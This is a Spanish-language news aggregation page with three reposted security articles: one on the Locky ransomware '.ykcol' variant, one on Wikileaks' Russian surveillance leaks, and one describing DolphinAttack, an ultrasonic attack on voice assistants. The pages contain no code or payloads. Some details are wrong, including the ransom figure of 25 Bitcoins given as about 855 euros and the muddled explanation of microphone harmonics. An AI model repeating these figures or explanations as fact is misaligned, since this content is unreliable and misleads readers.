.ykcol. Esto significa que un archivo denominado 1.png sería cifrado y llamado algo así como E87091F1-D24A-922B-00F6B112-72BB7EA6EADF.ykcol. Rescate Cuando Locky haya terminado de cifrar el ordenador, eliminará el ejecutable descargado y luego mostrará una nota de rescate que proporcione información sobre cómo pagar. Los nombres de estas notas de rescate han cambiado para esta versión a ykcol.htm y ykcol.bmp. Actualmente, el pago para descifrar el equipo es de 25 Bitcoins. Esto es el equivalente a unos 855 euros, en la actualidad. Por desgracia, en este momento todavía no es posible descifrar los archivos .ykcol cifrados por el Locky Ransomware de forma gratuita. Copia de seguridad La única manera de recuperar archivos cifrados es a través de una copia de seguridad. Es por ello que es muy recomendable realizar copias de seguridad de forma periódica. Con ello nos aseguramos que ante un problema como este podamos recuperar los archivos. Como podemos ver, el ransomware de Locky vuelve constantemente con nuevas variantes. La razón de que vuelva después de un tiempo aparentemente calmado, lo explicamos en un artículo que publicamos recientemente. Solamente durante el pasado mes de agosto pudimos ver dos variantes nuevas de Locky. Todas ellas, claro, con el mismo propósito: secuestrar los archivos de las víctimas y poder pedir un rescate económico. Como siempre decimos, lo mejor es mantener nuestro equipo perfectamente actualizado y con software de seguridad instalado. Con ello podremos hacer frente a posibles amenazas que pongan en riesgo el buen funcionamiento. Además, como hemos mencionado, es conveniente realizar una copia de seguridad de los archivos frecuentemente. Solo así podremos asegurar que no perdemos datos en un ataque similar. Publicamos un artículo donde hablábamos de los mejores programas y herramientas de seguridad gratuitos para Windows. Fuente:https://www.redeszone.net/2017/09/19/asi-la-ultima-variante-locky-ransomware-nos-jaque/ Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/asi-es-la-ultima-variante-de-locky-ransomware-que-nos-tiene-en-jaque/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Rusia espía las comunicaciones de los ciudadanos, según Wikileaks

Rusia espía las comunicaciones de los ciudadanos, según Wikileaks | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/rusia-espia-las-comunicaciones-de-los-ciudadanos-segun-wikileaks/ TAGS: "Spy Files Russia", Rusia Después sacar a la luz la serie Vault7 con supuestos archivos secretos de la CIA, ahora Wikileaks ha anunciado el inicio de una nueva serie de filtraciones: se llama "Spy Files Russia" y en esta ocasión se trata de documentos que describen el funcionamiento del supuesto sistema de vigilancia de la población del gobierno ruso. Con este movimiento, el portal de filtraciones dirigido por Julian Assange pretende dejar claro que no hay amistad con el Kremlin, algo que muchos ponían en duda. Estos rumores surgieron porque Assange rechazó publicar información acerca de la injerencia de Rusia en la campaña electoral de Estados Unidos de 2016, y se creía que este país le pasaba información a Wikileaks.   La primera entrega de la nueva serie de filtraciones ha hecho públicos hoy un total de 209 versiones de 34 documentos que datan de entre 2007 y 2015, que supuestamente demuestran la colaboración entre el estado ruso con Peter-Service, el principal proveedor de software para la industria de las telecomunicaciones móviles en Rusia.  De acuerdo con la información de Wikileaks, Peter-Service va mucho más allá del proceso clásico de facturación, extendiéndose a la vigilancia y el control de los abonados en asociación con el aparato de inteligencia estatal. Según la versión del portal, la compañía expone metadatos valiosos de los usuarios que incluyen los registros de llamadas y mensajes, identificadores de dispositivos (IMEI y direcciones MAC), direcciones IP o información de la torre de conexión móvil, entre otros datos privados. La captura de los datos de las comunicaciones de las redes rusas se lleva a cabo mediante componentes integrados en la arquitectura base del software de Peter-Service, que son los siguientes: Sistemas para la retención de datos (DRS por sus siglas en inglés): componente obligatorio por ley para todos los operadores, que almacena metadatos de la comunicación localmente durante tres años. Puede manejar 500 millones de conexiones al día y proporciona los registros de un abonado durante 24 horas en solo diez segundos. Almacenamiento a largo plazo: funciones de monitorización de llamadas que permite efectuar búsquedas e interceptar llamadas. Análisis de tráfico iP: para esta tarea Peter-Service utiliza Traffic Data Mart (TMD), un sistema que registra y monitoriza el tráfico IP para todos los dispositivos móviles registrados con el operador. Los usuarios están clasificados por categorías, donde que encontramos listas negras, sitios criminales o terrorismo, entre otras muchas. Interfaces para que las agencias estatales accedan a los archivos. Además, el informe de Wikileaks también añade como documento relacionado una presentación de esta compañía que data del año 2013. El archivo recoge la propuesta a las fuerzas del orden, inteligencia y otras partes interesadas en participar en una alianza con el fin de establecer operaciones de vigilancia masiva similares a las que según Edward Snowden llevaba a cabo la NSA. Este espionaje se llevaría a cabo mediante un producto llamado DPI GRID, una solución de hardware similar a una caja negra que podría manejar un tráfico de 10 Gb/s por unidad. Fuente:http://computerhoy.com/noticias/software/rusia-espia-comunicaciones-ciudadanos-segun-wikileaks-68308 Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/rusia-espia-las-comunicaciones-de-los-ciudadanos-segun-wikileaks/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Es posible hackear los asistentes virtuales mediante ultrasonidos

Es posible hackear los asistentes virtuales mediante ultrasonidos | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/es-posible-hackear-los-asistentes-virtuales-mediante-ultrasonidos/ TAGS: Altavoces, hackear, hogar, robo datos, robots Los tradicionales métodos de robo de datos parecen quedarse anticuados para los amantes de lo ajeno, quienes buscan nuevas maneras de hacerse con los datos. Y parece ser que es posible si tenemos en cuenta lo fácil que es hackear los asistentes virtuales mediante comandos de voz por ultrasonidos. Investigadores de seguridad en China pertenecientes a la Universidad de Zhejiang han descubierto un fallo por el cual utilizando altas frecuencia inaudibles para los seres humanos pero que sí quedan registradas en los micrófonos electrónicos es posible robar datos de los asistentes virtuales. Bajo un técnica bautizada como DolphinAttack se ha conseguido por ejemplo activar Google Now y hacer que un teléfono entre en modo avión, manipular el sistema de navegación de un Audi Q3, etc. Hasta siete asistentes virtuales disponibles en el mercado: Siri (de Apple), Google Now, Alexa (de Amazon), S Voice (de Samsung), Cortana (Microsoft) y HiVoice (Huawei) han sido víctimas. Como aparatos electrónicos que son, los micrófonos disponen de una membrana pequeña y delgada que vibra como respuesta a los cambios de presión de aire causados por las ondas sonoras. Los seres humanos tenemos una capacidad auditiva límite de 20000 Hz, por encima de los cuales no oímos nada. Por defecto, el software de los micrófonos descarta cualquier señal por encima de esta frecuencia, aunque técnicamente sí las sigue detectando - a esto se le conoce como filtro de paso bajo. De frecuencias de los comandos de voz hechas por un ser un humano a frecuencias de ultrasonido Un micrófono perfecto vibraría a una frecuencia conocida en, y sólo en, ciertas frecuencias de entrada. Pero en realidad, la membrana está sometida a armónicos provocados por las ondas, lo que hace que, por ejemplo, un tono de 400 Hz provoque una respuesta a 200 Hz y 800 Hz. Eso sí, suelen ser más débiles que los de la vibración original. Esto es lo que nos permite poder registrar un tono a 100 Hz sin emitir dicho sonido. Lo haríamos generando un tono a 800 Hz suficientemente potente, el cual daría lugar a un tono de 100 Hz con sus armónicos sólo en el micrófono. De esta manera, las personas oyen el tono original pero desconocen que el dispositivo ha registrado más datos.  Basándose en estos principios científicos, los investigadores chinos determinaron que la mayoría de los micrófonos usados en dispositivos activados por voz están sujetos a este efecto armónico. Para comprobarlo, crearon un tono objetivo con una frecuencia ultrasónica mucho más alta, que fue capaz de recrear fragmentos con tonos de capas de entre 500 y 1.000 Hz en las principales plataformas de reconocimiento de voz. "Los comandos de voz de DolpinAttack , aunque totalmente inaudibles y por lo tanto imperceptibles para los seres humanos, pueden ser recibidos por el hardware de audio de los dispositivos y correctamente entendidos por los sistemas de reconocimiento de voz. Hemos validado DolphinAttack en los principales sistemas de reconocimiento de voz, incluyendo Siri, Google Now, Samsung S Voice, Huawei HiVoice, Cortana y Alexa", han señalado este gurpo de investigadores. Así lo muestran en esta imagen, donde explican este peculiar proceso.
Fueron capaces de ejecutar una serie de comandos de voz que van desde frases conocidas (como "OK Google") hasta órdenes de varias palabras ("desbloquear la puerta trasera"). Las pruebas se centraron especialmente en Siri  y en los dispositivos de Apple, además de probar con Google Now en dos Nexus, S Voice en un S6 Edge, HiVoice en Honor 9, Cortana en un ThinkPad T440p con Windows 10 y Alexa en un Amazon Echo. Los resultados mostraron quees posible hackear los asistentes virtuales. Pero a no más de 5 pies de distancia.
¿Representa un peligro el hecho de que se puedan poner en marcha los sistemas de reconcimiento de voz sin necesidad de hablar? Hay varios aspectos que nos llevan a pensar que las alarmas no lo son tanto. En primer lugar, DolphinAttack es tan sencillo de desactivar con simplemente no tener abierta la interfaz de reconocimiento de voz. Si esta medida de protección se te olvida no te preocupes porque muchos asistentes virtuales tienen acceso restringido a ciertas funciones como los contactos, las apps y los sitios webs. En tercer lugar, los atacantes han de estar muy cerca de estos dispositivos para poder robar los datos.
Aún así es recomendable no bajar la guardia ante la utilización de nuevos métodos para hackear los asistentes virtuales empleando comandos de voz ultrasonidos.
Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/es-posible-hackear-los-asistentes-virtuales-mediante-ultrasonidos/
Via David Thomas
more...
No comment yet.